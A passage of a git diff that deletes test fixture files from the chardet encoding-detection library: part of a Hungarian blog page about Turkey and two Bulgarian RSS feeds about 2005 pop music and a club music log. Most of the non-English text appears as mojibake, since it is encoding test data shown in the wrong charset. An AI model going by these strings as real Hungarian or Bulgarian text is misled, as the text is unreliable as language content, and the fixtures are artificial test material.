Amelyikre klikkelsz, az jצn be תj oldalkיnt a bצngיsződben, rבadבsul a hozzבszףlבsok is automatikusan betצltődnek. A behםvott oldal aljבn a "Home" link segםtsיgיvel visszamehetsz a főoldalra יs a tartalomjegyzיkre.</p><p align="justify"><span style="color:#ff0000;">3. lehetősיg:</span> Mivel minden posztnak klצn URL-je van, amelyiket akarod, fel tudod venni a kedvenceid kצzי a bצngיsződben, םgy kיsőbb vissza tudsz tיrni csak az adott oldalra. Minden post aljבn egy dבtum van. Ha rבviszed a kurzort, permalinket jelez. Ha rבklikkelsz, a post צnבllף oldalkיnt jelenik meg a bצngיsződben יs םgy elmentheted a kedvencek kצzי.</p><p align="justify"><span style="color:#ff0000;">Post tovבbbםtבsa e-mailben</span></p><p align="justify">Minden egyes post szצvegיt e-mail zenetkיnt elkldheted annak, akinek akarod. Ehhez elיg a post jobb alsף sarkבban talבlhatף levיl szimbףlumra klikkelned. A postrףl a kיp (ha van) nem postבzףdik, csak a szצveg.</p><p align="justify"><span style="color:#ff0000;">Hozzבszףlבsok</span></p><p align="justify">A blogba mindenki םrhat, vיlemיnyedet szeretnיk ismerni a tצrzstagok יs יn is. Nem kell hozzב semmilyen regisztrבciף! Bבr a men angol nyelvű, kezelיse egyבltalבn nem bonyolult, יs a hozzבszףlבsodat termיszetesen magyarul םrhatod.</p><p align="justify">Mindig az בltalad kivבlasztott post jobb alsף sarkבban kell a "comments", majd a "Post a Comment" linkre klikkelni ahhoz, hogy a kצzlendőd az adott postban jelenjen meg. </p><p align="justify">Ekkor bejצn egy men, amelynek a jobb felső rיszיn lיvő mezőbe beםrhatod a hozzבszףlבsodat. Ha ez megvan, a jobb alsף rיszben lיvő lehetősיgek kצzl - amennyiben nem vagy regisztrבlt blogger -, jelצld ki az "anyone" szףt, majd kldd el a hozzבszףlבsodat. Kijelצlheted az "other" szףt is, ha van weboldalad יs a nevedet is fel akarod tntetni. </p><p align="justify"><span style="color:#ff0000;">FIGYELEM: ha visszatיrsz a postra יs azt lבtod, hogy nem jelent meg a kommentבrod, ne ess kיtsיgbe, nem rontottבl el semmit, s a blog is rendben műkצdik. Nem kell a hozzבszףlבsodat תjra meg תjra elkldeni!!! Mindצssze az oldalt kell frissםteni (pl. F5 gomb lenyomבsבval), s rצgtצn lבthatod, hogy a hozבszףlבsod mיgiscsak megjelent.</span></p><p align="justify">A szerkesztőnek - azaz nekem - lehetősיge van bבrmely hozzבszףlבst - utףlag - tצrצlni. Ez termיszetesen csak "kriminבlis" hozzבszףlבsok (ilyen mיg nem volt a blog fennבllבsa alatt) יs technikai problיmבk esetיn fordulhat elő, pl. ha egy lבtogatף vיletlenl tצbbszצr is elkldte ugyanazt az zenetיt ( ez elיg gyakran van). </p><p align="justify">A tצbbiek vבlaszait vagy az יn vבlaszaimat a kיrdיseitekre בltalבban annak a postnak a hozzבszףlבsai kצzצtt talבlhatjבtok meg, amelyben a kיrdיseket feltettיtek. </p><p align="justify">Ha csak nekem akarsz םrni, klikkelj ide: <a href="mailto:efendi_online@yahoo.com">Efendi</a>. </p><p align="justify"><span style="color:#ff0000;">"Tבrsalgף" post</span></p><p align="justify">Ez a post azoknak van, akik nem egy, a blogon lיvő tיmבban, hanem kצtetlenl szeretnיnek hozzבszףlni. Mondjuk, olyan ez a post, mint egy faliתjsבg, ahol a kצzיrdekű kצzlemיnyeket elhelyezik.</p><p align="justify"><span style="color:#ff0000;">Jogvיdett tartalom</span></p><p align="justify">Ilyen szצveget, kיpet csak a szerzői jogok tulajdonosבnak igיnyeit tiszteletben tartva rakjatok fel!</p><p align="justify"><span style="color:#ff0000;">Adatvיdelem /Jognyilatkozat</span></p><p align="justify">Mivel a blog יs a hozzבszףlבsok megtekintיsיhez nem kell regisztrבciף vagy jelszף, minden szemיlyes adat, amelyet sajבt magad kצzצlsz a blogon, termיszetszerűleg azonnal mindenki szבmבra hozzבfיrhetővי vבlik. Az ebből szבrmazף esetleges hבtrבnyokיrt magad vagy a felelős!</p><p align="justify">A csak velem kצzצlt szemיlyes adataidat (beleיrtve e-mail cםmedet is) kifejezett hozzבjבrulבsod nיlkl nem adom בt senkinek - leszבmםtva a tצrvיny בltal előםrt eseteket. A kצzצs fotףalbumban megjelenő fיnykיpeid szerzői joga kizבrףlag tיged illet.</p><p align="justify">Ez a blog, tovבbbב a startlap Tצrצkorszבg יs Azerbajdzsבn oldala, meg a Flickren lיvő honlapom יs annak tצrצk vonatkozבsת aloldalai, szבmomra teljesen non-profit jellegűek: azokbףl anyagi előnyצm, bevיtelem, hasznom nincs, sőt. Ha ezeken az oldalakon reklבmokat lבtsz, azok nem nekem, hanem az oldalak fenntartףinak hasznosak.</p><p align="justify"><span style="color:#ff0000;">Szבmlבlף</span></p><p align="justify">A Sitemeter adatai szerint a blogot havi 1300 - 1500 lבtogatף keresi fel (az יn IP-cםmeimről tצrtיnő bejelentkezיseket, valamint az ugyanarrףl az IP-cםmről 30 percen belli תjabb bejelentkezיseket nem regisztrבljבk). </p><p align="justify"><span style="color:#ff0000;">Ingyen reklבm</span></p><p align="justify">Ha van sajבt weboldalad יs szeretnיd nיpszerűsםteni ezt a blogot, felteheted az alבbbi szצveges linket: <a href="http://torokorszag.blogspot.com/">Tצrצkorszבg fףrum</a>, vagy ezt a grafikus linket: <p align="center"><a href="http://photos1.blogger.com/img/284/1037/1024/banner%2023460.jpg"><img class="phostImg" src="http://photos1.blogger.com/img/284/1037/200/banner%2023460.jpg" border="0" /></a> </p><div align="center">Kצsz! </div><p align="center"></p><p align="justify"></p><p align="center"><br />Fotףk © 2004 - 2005, Efendi </p> -false - - diff --git a/chardet/tests/windows-1251-bulgarian/bbc.co.uk.popshow.xml b/chardet/tests/windows-1251-bulgarian/bbc.co.uk.popshow.xml deleted file mode 100644 index e251164..0000000 --- a/chardet/tests/windows-1251-bulgarian/bbc.co.uk.popshow.xml +++ /dev/null @@ -1,389 +0,0 @@ - - - - - BBC Bulgarian | ֿמן ״מף | Bulgarian Pop Show index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/index.shtml - ַאןאחוםא לאנךא ֱֱׁ 2004 - bg - 2005-06-14T10:57:37+00:00 - ַאןאחוםא לאנךא ֱֱׁ 2004 : http://www.bbc.co.uk/bulgarian/institutional/rss.shtml#copyright - worldservice.com/bulgarian - hourly - 1 - 2005-06-14T10:57:37+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - http://www.bbc.co.uk/bulgarian/images/furniture/syndication/bbcbulgarian_180x80.gif - - - Michael Jackson מןנאגהאם - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_jackson_verdict.shtml - װוםמגועו םא ןמן חגוחהאעא כטךףגאץא ןמ גנולו םא מבגגאםועמ םא התכדממקאךגאםאעא ןנטסתהא - 2005-06-14T09:39:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Live 8 ןמה ךנטעטךא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_live8_critic.shtml - װנמםעלוםתע םא בנטע ןמן דנףןאעא Blur ט גמךאכ םא ןמןףכנםטעו Gorillaz, Damon Albarn, סו טחךאחא ס ןנוםובנוזוםטו ןמ ןמגמה םא מבגוםט מע Bob Geldof ךמםצונע Live 8 - 2005-06-14T09:55:07+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ׁבמדמל Destiny's Child - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_destinys_child.shtml - R&B דנףןאעא ןמעגתנהט סכףץמגועו, קו ענטעו גמךאכטסעךט סא נורטכט הא ענתדםאע ןמ סמבסעגום ןתע - 2005-06-14T10:04:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ׀וךמנה חא Coldplay - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050607_coldplay_review.shtml - ׁ םמגט סט אכבףל X&Y, בנטעאםסךאעא נמך באםהא Coldplay ןמסעאגט םמג נוךמנה ןמ בנמי םא הטסךמגו, ןמנתקאםט מםכאים משו ןנוהט טחכטחאםועמ םא עאגאעא - 2005-06-07T12:21:44+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ׁתהבאעא םא Jackson - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050607_michael_jackson.shtml - ֿתנגטע הום מע מבסתזהאםטעא םא זףנטעמ ג ןנמצוסא םא ןמןחגוחהאעא חאגתנרט בוח הא סו סעטדםו המ חאךכ‏קוםטו - 2005-06-07T12:13:49+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֽמגט עאכאםעט - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050531_duke_spirit.shtml - ׁכוה הוב‏עםמעמ EP Roll, Spirit, Roll מע 2003, The Duke Spirit סו םאבטץא ג מךמעמ םא לףחטךאכםטעו ךנטעטצט ךאעמ והםא מע םאי-מבושאגאשטעו דנףןט םא ־סענמגא. ֽמגטע טל אכבףל מןנאגהא מקאךגאםטעא - 2005-05-31T10:16:13+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Live Aid גתחךנתסגא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050531_live_aid.shtml - ֻודוםהאנםטעו בכאדמעגמנטעוכםט ךמםצונעט מע 80-עו דמהטםט האגאע ןמגמה חא ןנומסלטסכםו םא ןנטחגאםטועמ םא ןמן לףחטךאעא - - 2005-05-31T09:46:22+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Kinks טכט Beatles? - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050524_kinks_or_beatles.shtml - ֽא עמחט גתןנמס מעדמגמנ האהמץא סכףראעוכטעו םא BBC Radio 2, ךמטעמ טחבנאץא םאי-דמכולטעו ץטעמגו חא ןמסכוהםטעו 5 הוסועטכועט - 2005-05-24T10:42:32+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֽוףסןמנטל נאכ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050524_elvispresley_guinness.shtml - Elvis Presley בו מןנוהוכום חא םאי-ןנוףסןוכטע לףחטךאםע חא גסטקךט גנולוםא ג נאכסעגמעמ מע ׁגועמגםטעו ׀וךמנהט םא Guinness - 2005-05-24T10:29:30+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ־עםמגמ םא ןתע - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050517_rolling_stones.shtml - ֽוףלמנטלטעו Rolling Stones מבגטץא ןכאםמגו חא מדנמלםמ עףנםו, ךמועמ שו חאןמקםו ס 35 ךמםצונעא ג אעטעו ט אםאהא ןנוח אגדףסע - 2005-05-17T10:39:03+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Yahoo ךמםךףנטנא Napster - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/05/050517_yahoo_napster.shtml - ֿנמהאזבאעא, נאחלםאעא ט סכףראםועמ םא לףחטךא ןמ טםעונםוע םאבטנאע גסו ןמגוקו ןמןףכנםמסע ג סגועא - 2005-05-17T10:52:01+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Billy Idol םא 50! - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050331_idol.shtml - ֿמגוקו מע הוסועטכועטו סכוה ןמסכוהםט סט סעףהטום אכבףל, נמך חגוחהאעא Billy Idol םאןמלםט חא סתשוסעגףגאםועמ סט - 2005-03-31T20:37:43+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ּףחטךא חא הףראעא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050322_kaiser_chiefs.shtml - Rolling Stone, BBC, NME סא והטםמהףרםט – Kaiser Chiefs סא והםא מע באםהטעו, ךמטעמ ענבגא הא םאבכ‏האגאלו מעבכטחמ חא ג בתהושו - 2005-03-22T11:32:25+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ִגמיםטךתע םא Justin - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050322_darkness_wax_statue.shtml - ֵךסצוםענטקםטע פנמםעלום םא באםהאעא The Darkness ו ג צוםעתנא םא םמגמ סתבטעטו ג בנטעאםסךאעא סעמכטצא - 2005-03-22T12:14:40+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ײגועמגועו םא עתדאעא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050315_arcade_fire.shtml - ׂאחט סענאםטצא שו גט חאןמחםאו ס טםעונוסםאעא ךאםאהסךא דנףןא Arcade Fire - 2005-03-15T11:34:20+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ׂטץמ ןנמבףזהאםו - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050308_block_party.shtml - ֲ ןנמףקגאםו םא BBC חא ַגףךא םא 2005, Bloc Party טחןתךםאץא ךאעמ והםא מע םאי-מבושאגאשטעו בנטעאםסךט דנףןט חא עאחט דמהטםא - 2005-03-08T11:31:32+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ָחדנגאשא חגוחהא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050308_fightstar.shtml - װנמםעלוםתע םא Fightstar Charlie Simpson םו סתזאכגא, קו ו םאןףסםאכ Busted - 2005-03-08T11:40:59+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - INXS עתנסט פנמםעלום - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050302_inxs.shtml - ֽאסךמנמ ג ֻמםהמם נמך דנףןאעא INXS מנדאםטחטנא ןנמסכףרגאםט חא חאלוסעםטך םא ןמךמיםט Michael Hutchence - 2005-03-02T11:30:09+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֳמכולטעו םאהוזהט - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/03/050301_libertines_blink182.shtml - ֽלא ט ןמכמגטם לוסוצ מעךאךעמ The Libertines בץא מבגוםט חא םאי-המבנא בנטעאםסךא באםהא מע NME ט ועמ קו ןנוסאעא מבגט נאחןאהאםועמ טל - 2005-03-01T11:21:10+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - נאע םא והםא ונא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/02/050222_hit_factory.shtml - ֿנוח סכוהגאשט לוסוצ שו סןנו הא סתשוסעגףגא והםמ מע לטעטקםטעו חגףךמחאןטסםט סעףהט ג ֽ‏ ֹמנך - 2005-02-22T13:01:21+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ּטךוכאםהזוכמ ג כטכאגמ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/02/050203_mercury_rev_album_review.shtml - ׁכוה 14 דמהטםט ךאנטונא ט לםמזוסעגמ ןנמלוםט ג סתסעאגא, Mercury Rev סו חאגנתשאע ס םמג אכבףל םא טלו The Secret Migration. ֽמ חאשמ דט םאנטקאע אלונטךאםסךטעו Pink Floyd? - 2005-02-03T10:18:48+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ײגועום ךאלףפכאז - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/02/050201_athlete_album_review.shtml - ְכבףלתע Tourist םא כמםהמםסךאעא קועגמנךא Athlete ו גהתץםמגגאש, מנטדטםאכום ט חאנאחום ס לוכמהטטעו סט טםהט ןמן. ֿתנגטע סטםדתכ מע םודמ ו ג ׂמן 10 חא געמנא סוהלטצא - 2005-02-03T16:25:01+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֿנמבטגתע םא Kasabian - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/01/050118_kasabian.shtml - 2004-עא בורו דמהטםאעא םא טםהט הוםס באםהאעא Kasabian. ׂ םו סאלמ ףסן הא סט טחדנאהט ךףכעמג טלטהז ג נאכסעגמעמ, םמ ט ןמכףקט ענט םמלטםאצטט חא עאח-דמהטרםטעו םאדנאהט Brit - 2005-01-18T11:56:26+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֻףהמנטט - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2004/09/040928_interpol_antics.shtml - ַאדאסועו כאלןאעא ט סו ןנטדמעגועו חא געמנאעא עאגא Antics םא Interpol, ךמעמ חאהלטםאגא הוב‏עא םא באםהאעא. ֿוסםטעו סא סאלמ הוסוע, םמ אעלמספונאעא ו םוםאהלטםאעא - 2004-09-28T13:18:52+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - Welcome To The North - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2004/09/040921_the_music.shtml - Welcome To The North ו התכדממקאךגאםטע םמג אכבףל םא באםהאעא The Music. ־עחטגטעו ןמקעט דאנאםעטנאע גטהםא ןמחטצט םא הטסךא ג קאנעא סכוהגאשאעא סוהלטצא - 2004-09-21T10:38:22+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ֳמנושט ןאנעטעא - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2005/06/050614_bulgarian_gigs.shtml - ׃המגמכסעגטו םא מעךנטעמ - 2005-06-14T10:46:28+00:00 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - - - ־ךמכמ סכתםצועמ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/bulgarian/popshow/story/2004/10/041005_rem.shtml - Around The Sun ו חאדכאגטועמ םא ענוןועםמ מקאךגאםט םמג אכבףל םא REM. ָחט ֲמסךטםאנם ןנמסכףרא ןוסםטעו ג עאגאעא ט םט האגא סגמעא מצוםךא - 2004-10-13T15:13:58+0000 - text/plain - bg - worldservice.com/bulgarian - http://www.bbc.co.uk/bulgarian/ - Story, Pop Show - http://www.bbc.co.uk/music/profiles/rem.shtml : ֿנמפטכ םא REM - http://www.remhq.com/flash/index.html : װוםסאיע םא REM - - - Live 8 - http://news.bbc.co.uk/1/hi/in_pictures/4596025.stm - - 2005-06-07T12:34:26+0000 - text/plain - bg - worldservice.com/bulgarian - External Link, Pop Show - - - ֻועםטעו פוסעטגאכט - http://news.bbc.co.uk/1/shared/spl/hi/entertainment/05/festivals/html/uk.stm - - 2005-05-31T10:30:11+0000 - text/plain - bg - worldservice.com/bulgarian - External Link, Pop Show - - - - <link>http://news.bbc.co.uk/1/hi/in_pictures/4089944.stm</link> - <description xml:lang="bg"/> - <dc:date>2005-06-14T10:55:41+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>bg</dc:language> - <dc:publisher>worldservice.com/bulgarian</dc:publisher> - <dc:type>External Link, Pop Show</dc:type> - </item> -</rdf:RDF> \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.2.xml b/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.2.xml deleted file mode 100644 index b3f949b..0000000 --- a/chardet/tests/windows-1251-bulgarian/bpm.cult.bg.2.xml +++ /dev/null @@ -1,193 +0,0 @@ -<?xml version="1.0" encoding="windows-1251"?> -<!-- -Source: http://bpm.cult.bg/logs/rdf.php?id=2 -Expect: windows-1251 ---> -<rdf:RDF - xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" - xmlns:dc="http://purl.org/dc/elements/1.1/" - xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" - xmlns:admin="http://webns.net/mvcb/" - xmlns:content="http://purl.org/rss/1.0/modules/content/" - xmlns:cc="http://web.resource.org/cc/" - xmlns="http://purl.org/rss/1.0/"> - -<channel rdf:about="http://bpm.cult.bg/medusa/logs/?id=2"> -<title>beat counter (beat.log) -http://bpm.cult.bg/medusa/logs/?id=2 -<b>׃האנט ג לטםףעa</b><br /> -׀אח... הגא... נאח... הגא... ־עבנמגאר עאךעמגועו. ׂנמןךאר ס ךנאך. ֿמךכאשאר סו ג ףםטסמם ס כ‏בטלאעא לףחטךא, ךמעמ ךתםעט ג סכףראכךטעו, טחסענוכגא סו ןנוח ףרטעו ט סו חאבטגא ג מםמגא סןוצטאכםמ לסעמ ג חאהםאעא קאסע םא למחתךא עט, ןמקעט םא עטכא. ׀אחךאזט םט חא לףחטךאעא םא עגמ זטגמע. ָכט ןמםו םא ןמסכוהםטעו הוסוע לטםףעט.<br /> -<br /> -<b>אך הא ןףבכטךףגאל עףך?</b><br /> -1. ׀ודטסענטנאר סו ג userlist-א םא סאיעא;<br /> -2. ֲסוךט נודטסענטנאם ןמענובטעוכ למזו הא ןףבכטךףגא גתג גסטקךמ בכמדמגו מסגום ג Devzilla ט Bazaar.<br /> -<br /> -<b>ֿנאגטכא חא ןףבכטךטגאםו?</b><br /> -1. ֽטךאךגט כטםךמגו ךתל ןמנםמדנאפסךמ סתהתנזאםטו! ױל, עמגא בורו חא הנףד כמד, םמ ט עףך ו ןנטכמזטלמ.<br /> -2. ֽו ןףבכטךףגאיעו טחמבנאזוםט, ךמטעמ נאחרטנגאע נאלךאעא םא כמדא - םטךמי םו מבטקא ץמנטחמםעאכום סךנמכ-באנ;<br /> -3. ֿףבכטךףגאיעו והטםסעגוםמ טחמבנאזוםט ג jpg, png ט gif פמנלאע. BMP ט TIF סא עמעאכםמ םוןנטדמהםט חא web;<br /> -4. ֽו ןףבכטךףגאיעו טחמבנאזוםט ןמ-דמכולט מע 10K. ֱכמדמגועו ט בוח עמגא סא מדנמלםט;) -bg-bg -*bpm -1970-01-01T02:01:00+02:00 - - - - - - - - - - - - - - - - - -Mogwai - Mr. Beast -http://bpm.cult.bg/medusa/logs/?id=&pid=7624 -Mogwai - Mr. Beast]]> -Mogwai - Mr. Beast]]> -beat counter (beat.log) -atomant -2006-01-01T18:01:06+02:00 - - -Richard Cheese - - :: listen - -*respect - -ְֲֵֵֻׁ ־ְִֵֻ... -http://bpm.cult.bg/medusa/logs/?id=&pid=7620 -
    -
    -Richard Cheese
    -
    - :: listen
    -
    -*respect
    -
    -ְֲֵֵֻׁ ־ְִֵֻ ָ ׃ְְּֽׂ ;)]]>
    -
    -
    -Richard Cheese
    -
    - :: listen
    -
    -*respect
    -
    -ְֲֵֵֻׁ ־ְִֵֻ ָ ׃ְְּֽׂ ;)]]>
    -beat counter (beat.log) -nmrp -2005-12-27T14:12:11+02:00 -
    - -Hot new stuff - ODORI... -http://bpm.cult.bg/medusa/logs/?id=&pid=7615 -Hot new stuff - ODORI 032
    -EVILJACK Vs KINK EP
    -
    -Copies are now in stock of this spelndid dancefloor selection. All the way from Bulgaria via Brighton, these two producers hooked up online and have both contributed tracks to this split 12.
    -KiNK ס נוכטח חא Odori (SWAG!!). 3עמ לסעמ ג acidhouse קאנעא, םאנוה ס אדוםעט מע נאםךא םא Jazzy eyewear, Martini Bros, Anders Ilar ט John Dahlbאck..
    -ֱנאגמ ׁענאץמ, ס עוב סלו!!
    -Kווp pushin to the top bwoy!
    -(--ֿתנגמ לסעמ ג קאנעמגועו, למכ ;;))]]>
    -Hot new stuff - ODORI 032
    -EVILJACK Vs KINK EP
    -
    -Copies are now in stock of this spelndid dancefloor selection. All the way from Bulgaria via Brighton, these two producers hooked up online and have both contributed tracks to this split 12.
    -KiNK ס נוכטח חא Odori (SWAG!!). 3עמ לסעמ ג acidhouse קאנעא, םאנוה ס אדוםעט מע נאםךא םא Jazzy eyewear, Martini Bros, Anders Ilar ט John Dahlbאck..
    -ֱנאגמ ׁענאץמ, ס עוב סלו!!
    -Kווp pushin to the top bwoy!
    -(--ֿתנגמ לסעמ ג קאנעמגועו, למכ ;;))]]>
    -beat counter (beat.log) -yme -2005-12-22T10:12:03+02:00 -
    - -ענטןטעט-ץמן לטךס מע R‎s. סענאץמעםמ... -http://bpm.cult.bg/medusa/logs/?id=&pid=7614 -לטךס מע R‎s. סענאץמעםמ םאסענמוםטו. via !title]]> -לטךס מע R‎s. סענאץמעםמ םאסענמוםטו. via !title]]> -beat counter (beat.log) -Lucash -2005-12-21T13:12:08+02:00 - - -Club "Don`t Panic" will open... -http://bpm.cult.bg/medusa/logs/?id=&pid=7612 - -ֽו ו 100% סטדףנםמ קו ןאנעטעמ ס ֳנאםע ִוכ שו סו סתסעמט םא 23-עט, םמ ךכףבקועמ שו מעגמנט גנאעט נאםמ טכט ךתסםמ ט שו טחןנמבגאלו עאחט soundsystem. ־קאךגאל לםמדמ מע גתןנמסםטעו, וכטעםט sound engeneers, so beware!!!]]> - -ֽו ו 100% סטדףנםמ קו ןאנעטעמ ס ֳנאםע ִוכ שו סו סתסעמט םא 23-עט, םמ ךכףבקועמ שו מעגמנט גנאעט נאםמ טכט ךתסםמ ט שו טחןנמבגאלו עאחט soundsystem. ־קאךגאל לםמדמ מע גתןנמסםטעו, וכטעםט sound engeneers, so beware!!!]]> -beat counter (beat.log) -yme -2005-12-20T21:12:01+02:00 - - -Kattoo - Megrim -... -moreover: -Beefcake; Kattoo; -http://bpm.cult.bg/medusa/logs/?id=&pid=7611 -Kattoo - Megrim
    -...
    -moreover:
    -Beefcake; Kattoo;]]>
    -Kattoo - Megrim
    -...
    -moreover:
    -Beefcake; Kattoo;]]>
    -beat counter (beat.log) -atomant -2005-12-19T22:12:07+02:00 -
    - -tonight - lost in dub... -http://bpm.cult.bg/medusa/logs/?id=&pid=7607 - - -beat counter (beat.log) -yme -2005-12-15T13:12:38+02:00 - - -Artery - Take It From... -http://bpm.cult.bg/medusa/logs/?id=&pid=7600 - -לםמדמ לו ןתכםט ע'גא ןאנקו, א ךכטןא דמ טלא םא ׁענמוזא]]> - -לםמדמ לו ןתכםט ע'גא ןאנקו, א ךכטןא דמ טלא םא ׁענמוזא]]> -beat counter (beat.log) -Tcmendor -2005-12-13T15:12:53+02:00 - - -"ןתכםטּ ןאןךט, ןמסכו ךמלןנוסטנא-אל -ט ג... -http://bpm.cult.bg/medusa/logs/?id=&pid=7599 - -ט ג נטסאיךתכ בטםא-א"
    -ךמו, ךמו?]]>
    - -ט ג נטסאיךתכ בטםא-א"
    -
    ךמו, ךמו?]]> -beat counter (beat.log) -yme -2005-12-13T13:12:34+02:00 -
    - -ֿנטעםאעא טחםוםאהא מע ןמסכוהםט סוע... -http://bpm.cult.bg/medusa/logs/?id=&pid=7596 -C&M productions ו ןמחםאע ט כ‏בטל דכאס - ֱוכמסכאגא. ׳אסע מע גתןנמסםט סוע ו והטם מע חאןטסטעו י חא Casa Flava ג ּאלט - I know. ָ מןנוהוכוםמ סט חאסכףזאגא נאחץמהךאעא המ סאיעא. ]]> -C&M productions ו ןמחםאע ט כ‏בטל דכאס - ֱוכמסכאגא. ׳אסע מע גתןנמסםט סוע ו והטם מע חאןטסטעו י חא Casa Flava ג ּאלט - I know. ָ מןנוהוכוםמ סט חאסכףזאגא נאחץמהךאעא המ סאיעא. ]]> -beat counter (beat.log) -snark -2005-12-12T18:12:01+02:00 -
    -
